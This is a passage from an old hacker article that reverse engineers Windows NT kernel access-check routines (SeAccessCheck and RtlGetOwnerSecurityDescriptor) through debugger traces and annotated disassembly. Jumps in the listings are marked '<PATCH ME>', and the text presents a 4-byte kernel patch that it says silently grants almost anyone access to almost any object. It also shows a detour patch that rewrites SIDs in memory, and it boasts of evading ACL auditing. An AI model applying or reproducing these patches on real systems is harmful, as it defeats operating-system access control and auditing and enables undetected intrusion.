Kernel before doing any extra work. Because I wanted to circumvent access to a
file directly, I moved directly onward to the SeAccessCheck() function. Up
front, I set a breakpoint on this function to make sure it is being called when
accessing a file. To my excitement, it appears this function is called for
almost any object access, not just a file. This means network shares as well.
Going further, I tested my next patch against network share access as well as
file access. I created a test directory, shared it over the network, and
created a test file within that directory.
At first, the file had the default Everyone FULL CONTROL permissions. I set a
breakpoint on SeAccessCheck() and attempted to cat the file. For this simple
command the function is called three times:
Break due to BPX ntoskrnl!SeAccessCheck (ET=2.01 seconds)
:stack
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D1C)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711734)
Break due to BPX ntoskrnl!SeAccessCheck (ET=991.32 microseconds)
:stack
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711CB8)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD7116D8)
Break due to BPX ntoskrnl!SeAccessCheck (ET=637.15 microseconds)
:stack
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D08)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711720)
Next I set the file access to Administrator NO ACCESS. Attempting to cat the
file locally resulted in an "Access Denied" message. The routine is called 13
times before the Access Denied message is given. Now I try to access it over
the network. The function is called a total of 18 times before a Access Denied
message is given. It would seem it takes alot more work to deny access than it
does to give it. ;)
I was lit now, it looked like I had my target. After another 2 shots of
espresso, I dumped the IDA file for SeAccessCheck, busted into SoftIce and
started exploring:
To make things simpler, I have removed some of the assembly code that is not
part of my discussion. If you are going to start playing with this, then you
should disassemble all of this yourself nonetheless. I recommend IDA. At
first I tried WDAsm32, but it was unable to decompile the ntoskrnl.exe
binary properly. IDA, on the other hand, had no problems. WDAsm32 has a
much nicer GUI interface, but IDA has proved more reliable. Just as most
engineers, I use many tools to get the job done, so I recommend having both
disassemblers around.
The function & patches:
8019A0E6 ; Exported entry 816. SeAccessCheck
8019A0E6
8019A0E6 ;
===========================================================================
8019A0E6
8019A0E6 ; S u b r o u t i n e
8019A0E6 ; Attributes: bp-based frame
8019A0E6
8019A0E6 public SeAccessCheck
8019A0E6 SeAccessCheck proc near
8019A0E6 ; sub_80133D06+B0�p ...
8019A0E6
8019A0E6 arg_0 = dword ptr 8 ; appears to point to a
; Security Descriptor
8019A0E6 arg_4 = dword ptr 0Ch
8019A0E6 arg_8 = byte ptr 10h
8019A0E6 arg_C = dword ptr 14h
8019A0E6 arg_10 = dword ptr 18h
8019A0E6 arg_14 = dword ptr 1Ch
8019A0E6 arg_18 = dword ptr 20h
8019A0E6 arg_1C = dword ptr 24h
8019A0E6 arg_20 = dword ptr 28h
8019A0E6 arg_24 = dword ptr 2Ch
8019A0E6
8019A0E6 push ebp
8019A0E7 mov ebp, esp
8019A0E9 push ebx
8019A0EA push esi
8019A0EB push edi
8019A0EC cmp byte ptr [ebp+arg_1C], 0
8019A0F0 mov ebx, [ebp+arg_C]
8019A0F3 jnz short loc_8019A137
8019A0F5 test ebx, 2000000h
8019A0FB jz short loc_8019A11D
8019A0FD mov eax, [ebp+arg_18]
8019A100 mov edi, [ebp+arg_20]
8019A103 mov ecx, ebx
8019A105 mov eax, [eax+0Ch]
8019A108 and ecx, 0FDFFFFFFh
8019A10E mov [edi], eax
8019A110 or ecx, eax
8019A112 mov eax, [ebp+arg_10]
8019A115 or eax, ecx
8019A117 mov [edi], ecx
8019A119 mov [edi], eax
8019A11B jmp short loc_8019A13A
8019A11D ;
===========================================================================
8019A11D
8019A11D loc_8019A11D: ; CODE XREF: SeAccessCheck+15
8019A11D mov eax, [ebp+arg_10]
8019A120 mov edi, [ebp+arg_20]
8019A123 or eax, ebx
8019A125 mov edx, [ebp+arg_24]
8019A128 mov [edi], eax
8019A12A mov al, 1
8019A12C mov dword ptr [edx], 0
8019A132 jmp loc_8019A23A
8019A137 ;
===========================================================================
8019A137
8019A137 loc_8019A137: ; CODE XREF: SeAccessCheck+D
8019A137 mov edi, [ebp+arg_20]
8019A13A
8019A13A loc_8019A13A: ; CODE XREF: SeAccessCheck+35
8019A13A cmp [ebp+arg_0], 0
8019A13E jnz short loc_8019A150
8019A140 mov edx, [ebp+arg_24]
8019A143 xor al, al
; STATUS_ACCESS_DENIED not hit
; under normal means
8019A145 mov dword ptr [edx], 0C0000022h
8019A14B jmp loc_8019A23A
8019A150 ;
===========================================================================
8019A150
8019A150 loc_8019A150: ; CODE XREF: SeAccessCheck+58
8019A150 mov esi, [ebp+arg_4]
8019A153 cmp dword ptr [esi], 0
8019A156 jz short loc_8019A16E
8019A158 cmp dword ptr [esi+4], 2
8019A15C jge short loc_8019A16E
8019A15E mov edx, [ebp+arg_24]
8019A161 xor al, al
; STATUS_BAD_IMPERSONATION_LEVEL
; not normally hit
8019A163 mov dword ptr [edx], 0C00000A5h
8019A169 jmp loc_8019A23A
8019A16E ;
===========================================================================
8019A16E
8019A16E loc_8019A16E: ; CODE XREF: SeAccessCheck+70
8019A16E ; SeAccessCheck+76
8019A16E test ebx, ebx
8019A170 jnz short loc_8019A1A0
8019A172 cmp [ebp+arg_10], 0
8019A176 jnz short loc_8019A188
8019A178 mov edx, [ebp+arg_24]
8019A17B xor al, al
; STATUS_ACCESS_DENIED not
; normally hit
8019A17D mov dword ptr [edx], 0C0000022h
8019A183 jmp loc_8019A23A
8019A188 ;
===========================================================================
8019A188
8019A188 loc_8019A188: ; CODE XREF: SeAccessCheck+90
8019A188 mov eax, [ebp+arg_10]
8019A18B xor ecx, ecx
8019A18D mov edx, [ebp+arg_24]
8019A190 mov [edi], eax
8019A192 mov eax, [ebp+arg_14]
8019A195 mov [edx], ecx
8019A197 mov [eax], ecx
8019A199 mov al, 1
8019A19B jmp loc_8019A23A
8019A1A0 ;
===========================================================================
8019A1A0
8019A1A0 loc_8019A1A0: ; CODE XREF: SeAccessCheck+8A
8019A1A0 cmp [ebp+arg_8], 0
8019A1A4 jnz short loc_8019A1AC
8019A1A6 push esi
8019A1A7 call SeLockSubjectContext
8019A1AC
8019A1AC loc_8019A1AC: ; CODE XREF: SeAccessCheck+BE
8019A1AC test ebx, 2060000h
8019A1B2 jz short loc_8019A1EA
8019A1B4 mov eax, [esi]
8019A1B6 test eax, eax
8019A1B8 jnz short loc_8019A1BD
8019A1BA mov eax, [esi+8]
8019A1BD
8019A1BD loc_8019A1BD: ; CODE XREF: SeAccessCheck+D2
8019A1BD push 1
8019A1BF push [ebp+arg_0]
8019A1C2 push eax
8019A1C3 call sub_8019A376
8019A1C8 test al, al
8019A1CA jz short loc_8019A1EA
8019A1CC test ebx, 2000000h
8019A1D2 jz short loc_8019A1DA
8019A1D4 or byte ptr [ebp+arg_10+2], 6
8019A1D8 jmp short loc_8019A1E4
8019A1DA ;
===========================================================================
8019A1DA
8019A1DA loc_8019A1DA: ; CODE XREF: SeAccessCheck+EC
8019A1DA mov eax, ebx
8019A1DC and eax, 60000h
8019A1E1 or [ebp+arg_10], eax
8019A1E4
8019A1E4 loc_8019A1E4: ; CODE XREF: SeAccessCheck+F2
8019A1E4 and ebx, 0FFF9FFFFh
8019A1EA
8019A1EA loc_8019A1EA: ; CODE XREF: SeAccessCheck+CC
8019A1EA ; SeAccessCheck+E4
8019A1EA test ebx, ebx
8019A1EC jnz short loc_8019A20C
8019A1EE cmp [ebp+arg_8], 0
8019A1F2 jnz short loc_8019A1FA
8019A1F4 push esi
8019A1F5 call SeUnlockSubjectContext
8019A1FA
8019A1FA loc_8019A1FA: ; CODE XREF: SeAccessCheck+10
8019A1FA mov eax, [ebp+arg_10]
8019A1FD mov edx, [ebp+arg_24]
8019A200 mov [edi], eax
8019A202 mov al, 1
8019A204 mov dword ptr [edx], 0
8019A20A jmp short loc_8019A23A
8019A20C ;
===========================================================================
Since most of the arguments are being passed to this, it looks like this
routine is a wrapper for this other one.. lets delve deeper....
8019A20C
8019A20C loc_8019A20C: ; CODE XREF: SeAccessCheck+106
8019A20C push [ebp+arg_24]
8019A20F push [ebp+arg_14]
8019A212 push edi
8019A213 push [ebp+arg_1C]
8019A216 push [ebp+arg_10]
8019A219 push [ebp+arg_18]
8019A21C push ebx
8019A21D push dword ptr [esi]
8019A21F push dword ptr [esi+8]
8019A222 push [ebp+arg_0]
8019A225 call sub_80199836 ; decompiled below ***
8019A22A cmp [ebp+arg_8], 0
8019A22E mov bl, al
8019A230 jnz short loc_8019A238
8019A232 push esi
8019A233 call SeUnlockSubjectContext ; not usually hit
8019A238
8019A238 loc_8019A238: ; CODE XREF: SeAccessCheck+14A
8019A238 mov al, bl
8019A23A
8019A23A loc_8019A23A: ; CODE XREF: SeAccessCheck+4C
8019A23A ; SeAccessCheck+65 ...
8019A23A pop edi
8019A23B pop esi
8019A23C pop ebx
8019A23D pop ebp
8019A23E retn 28h
8019A23E SeAccessCheck endp
Subroutine called from SeAccessCheck. Looks like most of work is being done in
here. I will try to patch this routine.
80199836 ;
==============================================================================
80199836
80199836 ; S u b r o u t i n e
80199836 ; Attributes: bp-based frame
80199836
80199836 sub_80199836 proc near ; CODE XREF: PAGE:80199FFA
80199836 ; SeAccessCheck+13F ...
80199836
80199836 var_14 = dword ptr -14h
80199836 var_10 = dword ptr -10h
80199836 var_C = dword ptr -0Ch
80199836 var_8 = dword ptr -8
80199836 var_2 = byte ptr -2
80199836 arg_0 = dword ptr 8
80199836 arg_4 = dword ptr 0Ch
80199836 arg_8 = dword ptr 10h
80199836 arg_C = dword ptr 14h
80199836 arg_10 = dword ptr 18h
80199836 arg_16 = byte ptr 1Eh
80199836 arg_17 = byte ptr 1Fh
80199836 arg_18 = dword ptr 20h
80199836 arg_1C = dword ptr 24h
80199836 arg_20 = dword ptr 28h
80199836 arg_24 = dword ptr 2Ch
80199836
80199836 push ebp
80199837 mov ebp, esp
80199839 sub esp, 14h
8019983C push ebx
8019983D push esi
8019983E push edi
8019983F xor ebx, ebx
80199841 mov eax, [ebp+arg_8] ; pulls eax
80199844 mov [ebp+var_14], ebx ; ebx is zero, looks
; like it init's a
; bunch of local vars
80199847 mov [ebp+var_C], ebx
8019984A mov [ebp-1], bl
8019984D mov [ebp+var_2], bl
80199850 cmp eax, ebx ; check that arg8 is
; NULL
80199852 jnz short loc_80199857
80199854 mov eax, [ebp+arg_4] ; arg4 pts to
; "USER32 "
80199857
80199857 loc_80199857:
80199857 mov edi, [ebp+arg_C] ; checking some flags
; off of this one
8019985A mov [ebp+var_8], eax ; var_8 = arg_4
8019985D test edi, 1000000h ; obviously flags..
; desired access mask
; I think...
80199863 jz short loc_801998CA ; normally this jumps..
; go ahead and jump
80199865 push [ebp+arg_18]
80199868 push [ebp+var_8]
8019986B push dword_8014EE94
80199871 push dword_8014EE90
80199877 call sub_8019ADE0 ; another undoc'd sub
8019987C test al, al ; return code
8019987E jnz short loc_80199890
80199880 mov ecx, [ebp+arg_24]
80199883 xor al, al
80199885 mov dword ptr [ecx], 0C0000061h
8019988B jmp loc_80199C0C
80199890 ;
===========================================================================
removed source here
801998CA ;
===========================================================================
801998CA
801998CA loc_801998CA: ; jump from above lands here
801998CA ; sub_80199836
801998CA mov eax, [ebp+arg_0] ; arg0 pts to a
; Security Descriptor
801998CD mov dx, [eax+2] ; offset 2 is that
; 80 04 number...
801998D1 mov cx, dx
801998D4 and cx, 4 ; 80 04 become 00 04
801998D8 jz short loc_801998EA ; normally doesnt jump
801998DA mov esi, [eax+10h] ; SD[10h] is an offset
; value to the DACL in
; the SD
801998DD test esi, esi ; make sure it exists
801998DF jz short loc_801998EA
801998E1 test dh, 80h
801998E4 jz short loc_801998EC
801998E6 add esi, eax ; FFWDS to first DACL
; in SD ******
801998E8 jmp short loc_801998EC ; normally all good
; here, go ahead and
; jump
801998EA ;
===========================================================================
801998EA
801998EA loc_801998EA: ; CODE XREF: sub_80199836+A2
801998EA ; sub_80199836+A9
801998EA xor esi, esi
801998EC
801998EC loc_801998EC: ; CODE XREF: sub_80199836+AE
801998EC ; sub_80199836+B2
801998EC cmp cx, 4 ; jump lands here
801998F0 jnz loc_80199BC6
801998F6 test esi, esi
801998F8 jz loc_80199BC6
801998FE test edi, 80000h ; we normally dont match this,
; so go ahead and jump
80199904 jz short loc_8019995E
- ** removed source here ***
8019995E ;
===========================================================================
8019995E
8019995E loc_8019995E: ; CODE XREF: sub_80199836+CE
8019995E ; sub_80199836+D4 ...
8019995E movzx eax, word ptr [esi+4] ; jump lands
80199962 mov [ebp+var_10], eax ; offset 4 is number of
; ACE's present in DACL
; var_10 = # Ace's
80199965 xor eax, eax
80199967 cmp [ebp+var_10], eax
8019996A jnz short loc_801999B7 ; normally jump
- ** removed source here ***
801999A2 ;
===========================================================================
- ** removed source here ***
801999B7 ;
===========================================================================
801999B7
801999B7 loc_801999B7: ; CODE XREF: sub_80199836+134
801999B7 test byte ptr [ebp+arg_C+3], 2 ; looks like part of
; the flags data,
; we usually jump
801999BB jz loc_80199AD3
- ** removed source here ***
80199AD3 ;
===========================================================================
80199AD3
80199AD3 loc_80199AD3: ; CODE XREF: sub_80199836+185
80199AD3 mov [ebp+var_C], 0 ; jump lands here
80199ADA add esi, 8
80199ADD cmp [ebp+var_10], 0 ; is number of ACE's zero?
80199AE1 jz loc_80199B79 ; normally not
80199AE7
80199AE7 loc_80199AE7: ; CODE XREF: sub_80199836+33D
80199AE7 test edi, edi ; the EDI register is very
; important we will continue
; to loop back to this point
; as we traverse each ACE
; the EDI register is modified
; with each ACE's access mask
; if a SID match occurs.
; Access is allowed only if
; EDI is completely blank
; by the time we are done. :-)
80199AE9 jz loc_80199B79 ; jumps to exit routine
; if EDI is blank
80199AEF test byte ptr [esi+1], 8 ; checks for ACE value
; 8, second byte..
; i dont know what
; this is, but if it's
; not 8, its not
; evaluated, not
; important
80199AF3 jnz short loc_80199B64
80199AF5 mov al, [esi] ; this is the ACE type,
; which is 0, 1, or 4
80199AF7 test al, al ; 0 is ALLOWED_TYPE and
; 1 is DENIED_TYPE
80199AF9 jnz short loc_80199B14 ; jump to next block if
; it's not type 0
80199AFB lea eax, [esi+8] ; offset 8 is the SID
80199AFE push eax ; pushes the ACE
80199AFF push [ebp+var_8]
80199B02 call sub_801997C2 ; checks to see if the
; caller matches the
; SID return of 1 says
; we matched, 0 means
; we did not
80199B07 test al, al
80199B09 jz short loc_80199B64 ; a match here is good,
; since its the ALLOWED
; list
; so a 2 byte patch can
; NOP out this jump
; <PATCH ME>
80199B0B mov eax, [esi+4]
80199B0E not eax
80199B10 and edi, eax ; whiddles off the part
; of EDI that we
; matched ..
; this chopping of
; flags can go on through
; many loops
; remember, we are only
; good if ALL of EDI is
; chopped away...
80199B12 jmp short loc_80199B64
80199B14 ;
===========================================================================
80199B14
80199B14 loc_80199B14: ; CODE XREF: sub_80199836+2C3
80199B14 cmp al, 4 ; check for ACE type 4
80199B16 jnz short loc_80199B4B ; normally we aren't
; this type, so jump
- ** removed source here ***
80199B4B ;
===========================================================================
80199B4B
80199B4B loc_80199B4B: ; CODE XREF: sub_80199836+2E0�j
80199B4B cmp al, 1 ; check for DENIED type
80199B4D jnz short loc_80199B64
80199B4F lea eax, [esi+8] ; offset 8 is the SID
80199B52 push eax
80199B53 push [ebp+var_8]
80199B56 call sub_801997C2 ; check the callers SID
80199B5B test al, al ; a match here is BAD,
; since we are being
; DENIED
80199B5D jz short loc_80199B64 ; so make JZ a normal
; JMP <PATCH ME>
80199B5F test [esi+4], edi ; we avoid this flag
; check w/ the patch
80199B62 jnz short loc_80199B79
80199B64
80199B64 loc_80199B64: ; CODE XREF: sub_80199836+2BD
80199B64 ; sub_80199836+2D3
80199B64 mov ecx, [ebp+var_10] ; our loop routine,
; called from above as
; we loop around and
; around.
; var_10 is the number
; of ACE's
80199B67 inc [ebp+var_C] ; var_C is the current
; ACE
80199B6A movzx eax, word ptr [esi+2] ; byte 3 is the offset
; to the next ACE
80199B6E add esi, eax ; FFWD
80199B70 cmp [ebp+var_C], ecx ; check to see if we
; are done
80199B73 jb loc_80199AE7 ; if not, go back up...
80199B79
80199B79 loc_80199B79: ; CODE XREF: sub_80199836+2AB
80199B79 ; sub_80199836+2B3
80199B79 xor eax, eax ; this is our general
; exit routine
80199B7B test edi, edi ; if EDI isnt empty,
; then a DENIED state
; was reached above
80199B7D jz short loc_80199B91 ; so patch the JZ into
; a JMP so we never
; return ACCESS_DENIED
; <PATCH ME>
80199B7F mov ecx, [ebp+arg_1C]
80199B82 mov [ecx], eax
80199B84 mov eax, [ebp+arg_24]
; STATUS_ACCESS_DENIED
80199B87 mov dword ptr [eax], 0C0000022h
80199B8D xor al, al
80199B8F jmp short loc_80199C0C
80199B91 ;
===========================================================================
80199B91
80199B91 loc_80199B91: ; CODE XREF: sub_80199836+347
80199B91 mov eax, [ebp+1Ch]
80199B94 mov ecx, [ebp+arg_1C] ; result code into
; &arg_1C
80199B97 or eax, [ebp+arg_C] ; checked passed in
; mask
80199B9A mov [ecx], eax
80199B9C mov ecx, [ebp+arg_24] ; result code into
; &arg_24, should be
; zero
80199B9F jnz short loc_80199BAB ; if everything above
; went OK, we should
jump
80199BA1 xor al, al
80199BA3 mov dword ptr [ecx], 0C0000022h
80199BA9 jmp short loc_80199C0C
80199BAB ;
===========================================================================
80199BAB
80199BAB loc_80199BAB: ; CODE XREF: sub_80199836+369
80199BAB mov dword ptr [ecx], 0 ; Good and Happy
; things, we passed!
80199BB1 test ebx, ebx
80199BB3 jz short loc_80199C0A
80199BB5 push [ebp+arg_20]
80199BB8 push dword ptr [ebp+var_2]
80199BBB push dword ptr [ebp-1]
80199BBE push ebx
80199BBF call sub_8019DC80
80199BC4 jmp short loc_80199C0A
80199BC6 ;
===========================================================================
removed code here
80199C0A loc_80199C0A: ; CODE XREF: sub_80199836+123
80199C0A ; sub_80199836+152
80199C0A mov al, 1
80199C0C
80199C0C loc_80199C0C: ; CODE XREF: sub_80199836+55
80199C0C ; sub_80199836+8F
80199C0C pop edi
80199C0D pop esi
80199C0E pop ebx
80199C0F mov esp, ebp
80199C11 pop ebp
80199C12 retn 28h ; Outta Here!
80199C12 sub_80199836 endp
Whew!
Some STRUCTURE dumps along the way:
:d eax
0023:E1A1C174 01 00 04 80 DC 00 00 00-EC 00 00 00 00 00 00 00 ................
; this looks like a SD
0023:E1A1C184 14 00 00 00 02 00 C8 00-08 00 00 00 00 09 18 00 ................
0023:E1A1C194 00 00 00 10 01 01 00 00-00 00 00 03 00 00 00 00 ................
0023:E1A1C1A4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00 ................
0023:E1A1C1B4 00 00 00 03 00 00 00 00-00 00 00 00 00 09 18 00 ................
0023:E1A1C1C4 00 00 00 10 01 01 00 00-00 00 00 05 12 00 00 00 ................
0023:E1A1C1D4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00 ................
0023:E1A1C1E4 00 00 00 05 12 00 00 00-00 00 00 00 00 09 18 00 ................
:d esi
0023:E1A1C188 02 00 C8 00 08 00 00 00-00 09 18 00 00 00 00 10 ................
; OFFSET into the SD (DACL)
0023:E1A1C198 01 01 00 00 00 00 00 03-00 00 00 00 00 00 00 00 ................
0023:E1A1C1A8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 03 ................
0023:E1A1C1B8 00 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10 ................
0023:E1A1C1C8 01 01 00 00 00 00 00 05-12 00 00 00 00 00 00 00 ................
0023:E1A1C1D8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 05 ................
0023:E1A1C1E8 12 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10 ................
0023:E1A1C1F8 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00 ........ ... ...
The following formats appear to be the SD, DACL, and ACE:
SD:
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
r | |04|80|fo| | | |fg| | | | | | |fd| | --==>
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
r: Revision, must be 1
fo: Offset to Owner SID
fg: Offset to Group SID
fd: Offset to DACL
ACL:
-- -- -- -- -- -- -- -- -- --
r | | | |na| | | |sa| | --==>
-- -- -- -- -- -- -- -- -- --
r: Revision?
na: Number of ACE's
sa: Start of first ACE
ACE:
-- -- -- -- -- -- -- -- -- --
t |i |oa| |am| | | |ss| | --==>
-- -- -- -- -- -- -- -- -- --
t: type, 0, 1, or 4
i: the ACE is ignored if this value isn't 8
oa: offset to next ACE
am: access mask associated with this SID
ss: start of the SID, normally at offset 8, but for ACE type 4, will be at
offset 0Ch
So there you have it, a 4 byte patch. Application of this patch will allow
almost anyone access to almost any object on your NT domain. Also, it is
undetectable when auditing ACL's and the such. The only indication something
is wrong is the fact your now opening the SAM database from a normal account
w/o a hitch... I can kill any process without being denied access.. God knows
what the NULL User session can get away with!. I like that. 8-/. Gee, it's
almost USEFUL isn't it?
Reverse Engineering & Patch of the RTLGetOwnerSecurityDescriptor() function
---------------------------------------------------------------------------
As if the last patch wasn't good enough, this patch should illustrate how easy
it is add your own code to the Kernel. Simply by patching a single jump, I
was able to detour the execution path into a highwayman's patch, and return
back to normal execution without a hitch. This patch alters a SID in memory,
violating the integrity of the security system. With a little creative light,
this patch could be so much more. There are hundreds of routines in the
ntoskrnl.exe. You are executing your own code in ring-0, so anything is
possible. If for any other reason, this paper should open your mind to the
possibilities. Reversing the NT Kernel is nothing new, I am quite sure.
I would bet that the NSA has the full source to the NT Kernel, and has written
some very elaborate patches. In fact, they were probably on that for NT 3.5.
80184AAC ;
===========================================================================
80184AAF align 4
80184AB0 ; Exported entry 719. RtlGetOwnerSecurityDescriptor
80184AB0
80184AB0 ;
===========================================================================
80184AB0
80184AB0 ; S u b r o u t i n e
80184AB0 ; Attributes: bp-based frame
80184AB0
80184AB0 public RtlGetOwnerSecurityDescriptor
80184AB0 RtlGetOwnerSecurityDescriptor proc near ; CODE XREF: sub_8018F318+22
80184AB0
80184AB0 arg_0 = dword ptr 8
80184AB0 arg_4 = dword ptr 0Ch
80184AB0 arg_8 = dword ptr 10h
80184AB0
80184AB0 push ebp
80184AB1 mov edx, [esp+arg_0]
80184AB5 mov ebp, esp
80184AB7 push esi
//
// MessageId: STATUS_UNKNOWN_REVISION
//
// MessageText:
//
// Indicates a revision number encountered or specified is not one
// known by the service. It may be a more recent revision than the
// service is aware of.
//
#define STATUS_UNKNOWN_REVISION ((NTSTATUS)0xC0000058L)
On SD Revision:
The user mode function InitializeSecurityDescriptor() will set the revision
number for the SD. The InitializeSecurityDescriptor() function initializes a
new security descriptor.
BOOL InitializeSecurityDescriptor(
PSECURITY_DESCRIPTOR pSecurityDescriptor, // address of security descriptor
DWORD dwRevision // revision level
);
Parameters:
pSecurityDescriptor: Points to a SECURITY_DESCRIPTOR structure that the
function initializes.
dwRevision: Specifies the revision level to assign to the security descriptor.
This must be SECURITY_DESCRIPTOR_REVISION.
80184AB8 cmp byte ptr [edx], 1 ; Ptr to decimal
; value usually 01,
; (SD Revision)
80184ABB jz short loc_80184AC4
; STATUS CODE (STATUS_UNKNOWN_REVISION)
80184ABD mov eax, 0C0000058h
80184AC2 jmp short loc_80184AF3 ; will exit
The next block here does some operations against the object stored *edx, which
is our first argument to this function. I think this may be a SD. There are
two different forms of an SD, absolute and relative.. here is the doc:
A security descriptor can be in absolute or self-relative form. In
self-relative form, all members of the structure are located contiguously
in memory. In absolute form, the structure only contains pointers to the
members.
This [edx] object is passed in as absolute:
Argument 1 (a SECURITY_DESCRIPTOR structure):
:d edx
0023:E1F47488 01 00 04 80 5C 00 00 00-6C 00 00 00 00 00 00 00 ....\...l.......
; 01 Revision, Flags 04,
; Offset to Owner SID is 5C,
; Offset to Primary Group SID is 6C
0023:E1F47498 14 00 00 00 02 00 48 00-02 00 00 00 00 00 18 00 ......H.........
0023:E1F474A8 FF 00 0F 00 01 02 00 00-00 00 00 05 20 00 00 00 ............ ...
0023:E1F474B8 20 02 00 00 00 00 14 00-FF 00 0F 00 01 01 00 00 ...............
0023:E1F474C8 00 00 00 05 12 00 00 00-00 00 4E 00 C8 FD 14 00 ..........N.....
0023:E1F474D8 E8 00 14 00 41 00 64 00-6D 00 69 00 01 02 00 00 ....A.d.m.i.....
; SIDS start here, see below
0023:E1F474E8 00 00 00 05 20 00 00 00-20 02 00 00 01 05 00 00 .... ... .......
0023:E1F474F8 00 00 00 05 15 00 00 00-BA 5D FF 0C 5C 4F CF 51 .........]..\O.Q
80184AC4 ;
===========================================================================
80184AC4
80184AC4 loc_80184AC4: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+B
80184AC4 mov eax, [edx+4] ; we are here if the revision
; is good
80184AC7 xor ecx, ecx
80184AC9 test eax, eax ; 01 00 04 80 >5C< which is
; [edx+4] must not be zero
; if the value IS zero, this
; means the SD does NOT have a
; owner, and it sets argument
; 2 to NULL, then returns,
; ignoring argument 3
; altogether.
80184ACB jnz short loc_80184AD4
80184ACD mov esi, [ebp+arg_4]
80184AD0 mov [esi], ecx
80184AD2 jmp short loc_80184AE1
80184AD4 ;
===========================================================================
80184AD4
80184AD4 loc_80184AD4: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+1B
80184AD4 test byte ptr [edx+3], 80h ; 01 00 04 >80< 5C
; which is [edx+3]
must be 80
80184AD8 jz short loc_80184ADC
80184ADA add eax, edx ; adds edx to 5C,
; which must be an
; offset to the SID
; within the SD
Note a couple of SIDS hanging around in this memory location. The first one is
the Owner, the second one must be the Group. The first SID, 1-5-20-220 is
BUILTIN\Administrators. By changing the 220 to a 222, we can alter this to be
BUILTIN\Guests. This will cause serious security problems. That second SID
happens to be long nasty one.. that is your first indication that it's NOT a
built-in group. In fact, in this case, the group is ANSUZ\None, a local group
on my NT Server (my server is obviously named ANSUZ.. ;)
:d eax
0023:E1A49F84 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00 ........ ... ...
; This is a SID in memory (1-5-20-220)
0023:E1A49F94 01 05 00 00 00 00 00 05-15 00 00 00 BA 5D FF 0C .............]..
; another SID
0023:E1A49FA4 5C 4F CF 51 FD 28 9A 4E-01 02
; (1-5-15-CFF5DBA-51CF4F5C-4E9A28FD-201)
Here we start working with arguments 1 & 2:
80184ADC
80184ADC loc_80184ADC: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+28
80184ADC mov esi, [ebp+arg_4]
80184ADF mov [esi], eax ; moving the address of the
; SID through the user
; supplied ptr (PSID pOwner)
80184AE1
80184AE1 loc_80184AE1: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+22
80184AE1 mov ax, [edx+2] ; some sort of flags
; 01 00 >04< 80 5C
80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be
; filled in with
flags data
80184AE8 and al, 1
80184AEA cmp al, 1 ; checking against a mask of
; 0x01
80184AEC setz cl ; set based on flags register
; (if previous compare was
true)
80184AEF xor eax, eax ; status is zero, all good ;)
80184AF1 mov [edx], cl ; the value is set for
; SE_OWNER_DEFAULTED
; true/false
80184AF3
80184AF3 loc_80184AF3: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+12
80184AF3 pop esi
80184AF4 pop ebp
80184AF5 retn 0Ch ; outta here, status in EAX
80184AF5 RtlGetOwnerSecurityDescriptor endp
This routine is called from the following stack(s):
(NtOpenProcessToken)
Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor (ET=31.98
milliseconds)
:stack at 001B:00000000 (SS:EBP 0010:00000000)
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8E3FF04)
ntoskrnl!NtOpenProcessToken+025E at 0008:80198834 (SS:EBP 0010:F8E3FEEC)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8E3FE50)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8E3FD80)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8E3FD48)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8E3FD34)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8E3FD20)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8E3FD00)
(PsCreateWin32Process)
Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor (ET=3.62 milliseconds)
:stack
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateWin32Process+01E7 at 0008:80192B5D (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsCreateSystemThread+04CE at 0008:8019303E (SS:EBP 0010:F8CDFE6C)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDC8)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCF8)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCC0)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCAC)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8CDFC98)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8CDFC78)
(PsCreateSystemThread)
:stack
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
